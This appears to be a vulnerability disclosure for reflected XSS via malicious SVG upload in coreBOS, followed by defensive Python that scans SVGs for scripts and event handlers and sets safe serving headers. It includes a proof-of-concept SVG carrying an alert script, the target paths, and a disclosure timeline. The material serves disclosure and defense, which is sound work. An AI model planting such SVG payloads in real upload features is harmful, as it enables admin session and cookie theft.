Cross-site Scripting (XSS) - Reflected in tsolucio/corebos

Valid

Reported on

Oct 18th 2021


Description

Reflected XSS via upload of malicious SVG file.

Proof of Concept

1: Upload the SVG file below via /corebos/index.php?module=Documents&action=DetailView&viewname=0&start=&record=8460&

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

2: Trigger the reflected XSS by visiting the malicious SVG file stored in the storage folder (the numeric prefix may differ): /corebos/storage/2021/October/week3/8464_payload.svg

Impact

This vulnerability allows an attacker to trick an admin user into visiting the malicious SVG file, causing a reflected XSS and stealing the cookie. It requires the ability to upload files.
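The root cause described above is that an uploaded SVG is later served from the storage folder in a way that lets the browser render it as a document, so any script it carries runs in the application's origin. Two defensive controls cover this: reject uploads that contain active content, and serve user-supplied SVGs so that the browser cannot execute them even if they slipped through. The following Python example is added here to illustrate both; it is not coreBOS code and does not reflect the fix merged in b44a52. The function names scan_svg and download_headers are assumptions, and the two SVG samples are constructed for the example (the first mirrors the shape of the proof-of-concept file).

```python
import xml.etree.ElementTree as ET

# Constructed sample inputs for this example (not files from the report).
# The first carries active content in two forms the scanner should catch.
ACTIVE_SVG = b'''<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg" onload="alert(1)">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">alert(document.location);</script>
</svg>'''

# A plain vector drawing with no script, handlers or links.
BENIGN_SVG = b'''<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
   <circle cx="5" cy="5" r="4" fill="#009900"/>
</svg>'''


def _local_name(qname):
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return qname.rsplit("}", 1)[-1].lower()


def scan_svg(data):
    """Return a list of findings describing active content in an SVG upload.

    An empty list means nothing suspicious was found. The checks are the
    usual ones for SVG: <script> and <foreignObject> elements, on* event
    handler attributes, and javascript: URLs in href attributes. Anything
    that does not parse as XML is reported too, since it cannot be vetted.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return ["unparseable SVG: %s" % exc]

    findings = []
    for elem in root.iter():
        name = _local_name(elem.tag)
        if name in ("script", "foreignobject"):
            findings.append("element <%s>" % name)
        for attr, value in elem.attrib.items():
            attr_name = _local_name(attr)
            if attr_name.startswith("on"):
                findings.append("event handler %s on <%s>" % (attr_name, name))
            if attr_name == "href" and value.strip().lower().startswith("javascript:"):
                findings.append("javascript: URL in href on <%s>" % name)
    return findings


def download_headers(filename):
    """Response headers for serving a user-uploaded SVG from storage.

    Content-Disposition: attachment makes the browser download the file
    instead of rendering it, nosniff stops content-type guessing, and the
    CSP sandbox directive keeps any script inert if the file is rendered
    anyway. The filename is quoted with embedded quotes stripped.
    """
    safe_name = filename.replace('"', "")
    return {
        "Content-Type": "image/svg+xml",
        "Content-Disposition": 'attachment; filename="%s"' % safe_name,
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
    }


if __name__ == "__main__":
    for label, sample in (("active", ACTIVE_SVG), ("benign", BENIGN_SVG)):
        print(label, "->", scan_svg(sample) or "no active content")
    print(download_headers("8464_payload.svg"))
```

In an upload handler the scan would run before the file is written to the storage folder, rejecting the upload when the findings list is non-empty; the headers belong on whatever route hands stored files back to the browser. The scanner is a deny-list and will not catch every obfuscation, which is why the serving headers are the control that actually closes the hole.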

We have contacted a member of the tsolucio/corebos team and are waiting to hear back 2 months ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. a month ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. a month ago
Joe Bordes validated this vulnerability a month ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes confirmed that a fix has been merged on b44a52 a month ago
Joe Bordes has been awarded the fix bounty